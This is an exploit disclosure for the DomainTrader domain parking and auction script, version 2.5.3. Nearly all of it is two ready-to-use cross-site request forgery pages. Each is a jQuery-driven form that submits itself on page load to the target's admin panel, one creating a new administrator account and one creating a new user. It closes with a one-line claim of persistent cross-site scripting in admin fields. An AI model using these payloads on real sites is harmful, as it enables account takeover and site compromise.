# Exploit Title: DomainTrader Domain Parking and Auction Script Multiple 0day Vulnerabilities # Google Dork: Find yourself xD # Date: 26/8/2014 # Exploit Author: Haider Mahmood | @HaiderMQ # Vendor Homepage: http://www.smartscriptsolutions.com/domain-trader/ # Version: Tested on Latest Version 2.5.3 Add new administrator CSRF: <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script> <script type="text/javascript"> $(document).ready(function() { window.document.forms[0].submit(); }); </script> <form name="add_admin" id="add_admin" method="post" action="victim.com/admin/admincp.php"> <input type="hidden" name="mode" value="addadminuser" /> <table width="400" border="0" cellspacing="0" cellpadding="0"> <tr> <td>Username:</td> <td><input name="username" type="text" value="USERNAME" /></td> </tr> <tr> <td>Email Address:</td> <td><input name="email_address" type="text" value="EMAIL_ADDRESS" /></td> </tr> <tr> <td>Password:</td> <td><input name="password" type="text" value="DESIRED_PASSWORD" /></td> </tr> <tr> <td><input name="submit" type="submit" value="Add User" /></td> <td> </td> </tr> </table> </form> Add new user CSRF: <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script> <script type="text/javascript"> $(document).ready(function() { window.document.forms[0].submit(); }); </script> <form name="add_user" id="add_user" method="post" action="victim.com/admin/admincp.php"> <input type="hidden" name="mode" value="addnewuser"> <table width="500" border="0" cellspacing="0" cellpadding="0"> <tr> <td><span>Username:</span></td> <td><input type="text" name="user_name" id="user_name" value="USERNAME_VALUE"></td> </tr> <tr> <td><span>Password:</span></td> <td><input type="password" name="newpassword" id="newpassword" value="DESIRED_PASSWORD"></td> </tr> <tr> <td><span>Confirm Password:</span></td> <td><input type="password" name="cnewpassword" id="cnewpassword" value="DESIRED_PASSWORD"></td> </tr> <tr> <td width="200"><span>First Name:</span></td> <td width="300"><input type="text" name="first_name" id="first_name" value="FIRSTNAME"></td> </tr> <tr> <td><span>Last Name:</span></td> <td><input type="text" name="last_name" id="last_name" value="LASTNAME"></td> </tr> <tr> <td><span>Email Address:</span></td> <td><input type="text" name="email_address" id="email_address" value="DESIRED_VALUE"></td> </tr> <tr> <td><span>Telephone:</span></td> <td><input type="text" name="telephone" id="telephone" value="010101010"></td> </tr> <tr> <td><span>Street Address:</span></td> <td><input type="text" name="street_address" id="street_address" value="BLA_BLA_BLA"></td> </tr> <tr> <td><span>City:</span></td> <td><input type="text" name="city" id="city" value="BLA_BLA_BLA"></td> </tr> <tr> <td><span>County/State:</span></td> <td><input type="text" name="county" id="county" value="BLA_BLA_BLA"></td> </tr> <tr> <td><span>Postcode/Zipcode:</span></td> <td><input type="text" name="postcode" id="postcode" value="BLA_BLA_BLA"></td> </tr> <tr> <td><span>Country:</span></td> <td> <select name="country" id="country"> <option value="AFGHANISTAN">AFGHANISTAN</option> <option value="ALBANIA">ALBANIA</option> <option value="ALGERIA">ALGERIA</option> <option value="AMERICAN SAMOA">AMERICAN SAMOA</option> <option value="ANDORRA">ANDORRA</option> <option value="ANGOLA">ANGOLA</option> <option value="ANTIGUA AND BARBUDA">ANTIGUA AND BARBUDA</option> <option value="ARGENTINA">ARGENTINA</option> <option value="ARMENIA">ARMENIA</option> <option value="ARUBA">ARUBA</option> <option value="AUSTRALIA">AUSTRALIA</option> <option value="AUSTRIA">AUSTRIA</option> <option value="AZERBAIJAN">AZERBAIJAN</option> <option value="BAHAMAS">BAHAMAS</option> <option value="BAHRAIN">BAHRAIN</option> <option value="BANGLADESH">BANGLADESH</option> <option value="BARBADOS">BARBADOS</option> <option value="BELARUS">BELARUS</option> <option value="BELGIUM">BELGIUM</option> <option value="BELIZE">BELIZE</option> <option value="BENIN">BENIN</option> <option value="BERMUDA">BERMUDA</option> <option value="BHUTAN">BHUTAN</option> <option value="BOLIVIA">BOLIVIA</option> <option value="BOSNIA AND HERZEGOVINA">BOSNIA AND HERZEGOVINA</option> <option value="BOTSWANA">BOTSWANA</option> <option value="BRAZIL">BRAZIL</option> <option value="BRITISH INDIAN OCEAN TERRITORY">BRITISH INDIAN OCEAN TERRITORY</option> <option value="BRUNEI DARUSSALAM">BRUNEI DARUSSALAM</option> <option value="BULGARIA">BULGARIA</option> <option value="BURKINA FASO">BURKINA FASO</option> <option value="BURUNDI">BURUNDI</option> <option value="CAMBODIA">CAMBODIA</option> <option value="CAMEROON">CAMEROON</option> <option value="CANADA">CANADA</option> <option value="CAPE VERDE">CAPE VERDE</option> <option value="CAYMAN ISLANDS">CAYMAN ISLANDS</option> <option value="CENTRAL AFRICAN REPUBLIC">CENTRAL AFRICAN REPUBLIC</option> <option value="CHAD">CHAD</option> <option value="CHILE">CHILE</option> <option value="CHINA">CHINA</option> <option value="COLOMBIA">COLOMBIA</option> <option value="COMOROS">COMOROS</option> <option value="CONGO">CONGO</option> <option value="COOK ISLANDS">COOK ISLANDS</option> <option value="COSTA RICA">COSTA RICA</option> <option value="COTE D'IVOIRE">COTE D'IVOIRE</option> <option value="CROATIA">CROATIA</option> <option value="CUBA">CUBA</option> <option value="CYPRUS">CYPRUS</option> <option value="CZECH REPUBLIC">CZECH REPUBLIC</option> <option value="DENMARK">DENMARK</option> <option value="DJIBOUTI">DJIBOUTI</option> <option value="DOMINICA">DOMINICA</option> <option value="DOMINICAN REPUBLIC">DOMINICAN REPUBLIC</option> <option value="ECUADOR">ECUADOR</option> <option value="EGYPT">EGYPT</option> <option value="EL SALVADOR">EL SALVADOR</option> <option value="EQUATORIAL GUINEA">EQUATORIAL GUINEA</option> <option value="ERITREA">ERITREA</option> <option value="ESTONIA">ESTONIA</option> <option value="ETHIOPIA">ETHIOPIA</option> <option value="FALKLAND ISLANDS (MALVINAS)">FALKLAND ISLANDS (MALVINAS)</option> <option value="FAROE ISLANDS">FAROE ISLANDS</option> <option value="FEDERATED STATES OF MICRONESIA">FEDERATED STATES OF MICRONESIA</option> <option value="FIJI">FIJI</option> <option value="FINLAND">FINLAND</option> <option value="FRANCE">FRANCE</option> <option value="FRENCH GUIANA">FRENCH GUIANA</option> <option value="FRENCH POLYNESIA">FRENCH POLYNESIA</option> <option value="FRENCH SOUTHERN TERRITORIES">FRENCH SOUTHERN TERRITORIES</option> <option value="GABON">GABON</option> <option value="GAMBIA">GAMBIA</option> <option value="GEORGIA">GEORGIA</option> <option value="GERMANY">GERMANY</option> <option value="GHANA">GHANA</option> <option value="GIBRALTAR">GIBRALTAR</option> <option value="GREECE">GREECE</option> <option value="GREENLAND">GREENLAND</option> <option value="GRENADA">GRENADA</option> <option value="GUADELOUPE">GUADELOUPE</option> <option value="GUAM">GUAM</option> <option value="GUATEMALA">GUATEMALA</option> <option value="GUINEA">GUINEA</option> <option value="GUINEA-BISSAU">GUINEA-BISSAU</option> <option value="GUYANA">GUYANA</option> <option value="HAITI">HAITI</option> <option value="HOLY SEE (VATICAN CITY STATE)">HOLY SEE (VATICAN CITY STATE)</option> <option value="HONDURAS">HONDURAS</option> <option value="HONG KONG">HONG KONG</option> <option value="HUNGARY">HUNGARY</option> <option value="ICELAND">ICELAND</option> <option value="INDIA">INDIA</option> <option value="INDONESIA">INDONESIA</option> <option value="IRAQ">IRAQ</option> <option value="IRELAND">IRELAND</option> <option value="ISLAMIC REPUBLIC OF IRAN">ISLAMIC REPUBLIC OF IRAN</option> <option value="ISRAEL">ISRAEL</option> <option value="ITALY">ITALY</option> <option value="JAMAICA">JAMAICA</option> <option value="JAPAN">JAPAN</option> <option value="JORDAN">JORDAN</option> <option value="KAZAKHSTAN">KAZAKHSTAN</option> <option value="KENYA">KENYA</option> <option value="KIRIBATI">KIRIBATI</option> <option value="KUWAIT">KUWAIT</option> <option value="KYRGYZSTAN">KYRGYZSTAN</option> <option value="LAO PEOPLE'S DEMOCRATIC REPUBLIC">LAO PEOPLE'S DEMOCRATIC REPUBLIC</option> <option value="LATVIA">LATVIA</option> <option value="LEBANON">LEBANON</option> <option value="LESOTHO">LESOTHO</option> <option value="LIBERIA">LIBERIA</option> <option value="LIBYAN ARAB JAMAHIRIYA">LIBYAN ARAB JAMAHIRIYA</option> <option value="LIECHTENSTEIN">LIECHTENSTEIN</option> <option value="LITHUANIA">LITHUANIA</option> <option value="LUXEMBOURG">LUXEMBOURG</option> <option value="MACAO">MACAO</option> <option value="MADAGASCAR">MADAGASCAR</option> <option value="MALAWI">MALAWI</option> <option value="MALAYSIA">MALAYSIA</option> <option value="MALDIVES">MALDIVES</option> <option value="MALI">MALI</option> <option value="MALTA">MALTA</option> <option value="MARSHALL ISLANDS">MARSHALL ISLANDS</option> <option value="MARTINIQUE">MARTINIQUE</option> <option value="MAURITANIA">MAURITANIA</option> <option value="MAURITIUS">MAURITIUS</option> <option value="MEXICO">MEXICO</option> <option value="MONACO">MONACO</option> <option value="MONGOLIA">MONGOLIA</option> <option value="MOROCCO">MOROCCO</option> <option value="MOZAMBIQUE">MOZAMBIQUE</option> <option value="MYANMAR">MYANMAR</option> <option value="NAMIBIA">NAMIBIA</option> <option value="NAURU">NAURU</option> <option value="NEPAL">NEPAL</option> <option value="NETHERLANDS">NETHERLANDS</option> <option value="NETHERLANDS ANTILLES">NETHERLANDS ANTILLES</option> <option value="NEW CALEDONIA">NEW CALEDONIA</option> <option value="NEW ZEALAND">NEW ZEALAND</option> <option value="NICARAGUA">NICARAGUA</option> <option value="NIGER">NIGER</option> <option value="NIGERIA">NIGERIA</option> <option value="NORTHERN MARIANA ISLANDS">NORTHERN MARIANA ISLANDS</option> <option value="NORWAY">NORWAY</option> <option value="OMAN">OMAN</option> <option value="PAKISTAN">PAKISTAN</option> <option value="PALAU">PALAU</option> <option value="PALESTINIAN TERRITORY">PALESTINIAN TERRITORY</option> <option value="PANAMA">PANAMA</option> <option value="PAPUA NEW GUINEA">PAPUA NEW GUINEA</option> <option value="PARAGUAY">PARAGUAY</option> <option value="PERU">PERU</option> <option value="PHILIPPINES">PHILIPPINES</option> <option value="POLAND">POLAND</option> <option value="PORTUGAL">PORTUGAL</option> <option value="PUERTO RICO">PUERTO RICO</option> <option value="QATAR">QATAR</option> <option value="REPUBLIC OF KOREA">REPUBLIC OF KOREA</option> <option value="REPUBLIC OF MOLDOVA">REPUBLIC OF MOLDOVA</option> <option value="REUNION">REUNION</option> <option value="ROMANIA">ROMANIA</option> <option value="RUSSIAN FEDERATION">RUSSIAN FEDERATION</option> <option value="RWANDA">RWANDA</option> <option value="SAINT KITTS AND NEVIS">SAINT KITTS AND NEVIS</option> <option value="SAINT LUCIA">SAINT LUCIA</option> <option value="SAINT VINCENT AND THE GRENADINES">SAINT VINCENT AND THE GRENADINES</option> <option value="SAMOA">SAMOA</option> <option value="SAN MARINO">SAN MARINO</option> <option value="SAO TOME AND PRINCIPE">SAO TOME AND PRINCIPE</option> <option value="SAUDI ARABIA">SAUDI ARABIA</option> <option value="SENEGAL">SENEGAL</option> <option value="SERBIA AND MONTENEGRO">SERBIA AND MONTENEGRO</option> <option value="SEYCHELLES">SEYCHELLES</option> <option value="SIERRA LEONE">SIERRA LEONE</option> <option value="SINGAPORE">SINGAPORE</option> <option value="SLOVAKIA">SLOVAKIA</option> <option value="SLOVENIA">SLOVENIA</option> <option value="SOLOMON ISLANDS">SOLOMON ISLANDS</option> <option value="SOMALIA">SOMALIA</option> <option value="SOUTH AFRICA">SOUTH AFRICA</option> <option value="SPAIN">SPAIN</option> <option value="SRI LANKA">SRI LANKA</option> <option value="SUDAN">SUDAN</option> <option value="SURINAME">SURINAME</option> <option value="SWAZILAND">SWAZILAND</option> <option value="SWEDEN">SWEDEN</option> <option value="SWITZERLAND">SWITZERLAND</option> <option value="SYRIAN ARAB REPUBLIC">SYRIAN ARAB REPUBLIC</option> <option value="TAIWAN">TAIWAN</option> <option value="TAJIKISTAN">TAJIKISTAN</option> <option value="THAILAND">THAILAND</option> <option value="THE DEMOCRATIC REPUBLIC OF THE CONGO">THE DEMOCRATIC REPUBLIC OF THE CONGO</option> <option value="THE FORMER GOSLAV REPUBLIC OF MACEDONIA">THE FORMER GOSLAV REPUBLIC OF MACEDONIA</option> <option value="TIMOR-LESTE">TIMOR-LESTE</option> <option value="TOGO">TOGO</option> <option value="TOKELAU">TOKELAU</option> <option value="TONGA">TONGA</option> <option value="TRINIDAD AND TOBAGO">TRINIDAD AND TOBAGO</option> <option value="TUNISIA">TUNISIA</option> <option value="TURKEY">TURKEY</option> <option value="TURKMENISTAN">TURKMENISTAN</option> <option value="TUVALU">TUVALU</option> <option value="UGANDA">UGANDA</option> <option value="UKRAINE">UKRAINE</option> <option value="UNITED ARAB EMIRATES">UNITED ARAB EMIRATES</option> <option value="UNITED KINGDOM">UNITED KINGDOM</option> <option value="UNITED REPUBLIC OF TANZANIA">UNITED REPUBLIC OF TANZANIA</option> <option value="UNITED STATES">UNITED STATES</option> <option value="URUGUAY">URUGUAY</option> <option value="UZBEKISTAN">UZBEKISTAN</option> <option value="VANUATU">VANUATU</option> <option value="VENEZUELA">VENEZUELA</option> <option value="VIET NAM">VIET NAM</option> <option value="VIRGIN ISLANDS">VIRGIN ISLANDS</option> <option value="VIRGIN ISLANDS">VIRGIN ISLANDS</option> <option value="YEMEN">YEMEN</option> <option value="ZAMBIA">ZAMBIA</option> <option value="ZIMBABWE">ZIMBABWE</option> </select> </td> </tr> <tr> <td colspan="2"><input name="new_message_notify" type="checkbox" value="1" /><span>Notify me by email when I receive a new message.</span></td> </tr> <tr> <td colspan="2"><input name="offer_received_notify" type="checkbox" value="1" /><span>Notify me by email when I receive a new offer.</span></td> </tr> <tr> <td colspan="2"><input name="offer_accepted_notify" type="checkbox" value="1" /><span>Notify me when an offer I made is accepted.</span></td> </tr> <tr> <td colspan="2"><input name="offer_cancelled_notify" type="checkbox" value="1" /><span>Notify me when an offer I made is cancelled</span></td> </tr> <tr> <td colspan="2"><input name="counter_offer_notify" type="checkbox" value="1" /><span>Notify me by email when a counter offer is made on a domain I own or am bidding on.</span></td> </tr> <tr> <td colspan="2"><input name="domain_pushed_notify" type="checkbox" value="1" /><span>Notify me by email when a domain is pushed.</span></td> </tr> <tr> <td colspan="2"><input name="sale_complete_notify" type="checkbox" value="1" /><span>Notify me by email when a domain sale is complete.</span></td> </tr> <tr> <td colspan="2"><input type="submit" name="Submit" value="Submit"></td> </tr> </table> </form> XSS: Add new Administrator values are not properly sanitized, neither on inserting into the database or selecting from the database causing Persistent XSS